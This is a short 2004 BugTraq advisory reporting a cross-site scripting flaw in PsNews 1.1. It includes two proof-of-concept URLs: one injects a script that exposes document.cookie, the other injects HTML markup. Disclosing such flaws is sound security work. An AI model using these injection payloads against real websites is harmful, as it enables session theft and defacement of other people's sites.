BugTraq
Bug XSS in PsNews 1.1 Sep 05 2004 06:52PM
Michal Blaszczak (wacky nicponie org)


°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

*5-9-2004

*Autor: wacky

*E-mail: wacky (at) nicponie (dot) org [email concealed]

*WWW: http://www.nicponie.org

°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

-----------------------------------------------

|Błąd Cross-Site Scripting (XSS) w PsNews 1.1 |

-----------------------------------------------

Exploit:

a)

http://[target]/index.php?function=show_all&no=%253cscript>alert%2528doc
ument.cookie);%253c/script>

b)

http://[target]/index.php?function=add_kom&no=">%20<font%20size="20"%20c
olor=red>%20<b>%20WackY%20%20</font>

°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

http://www.nicponie.org/

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus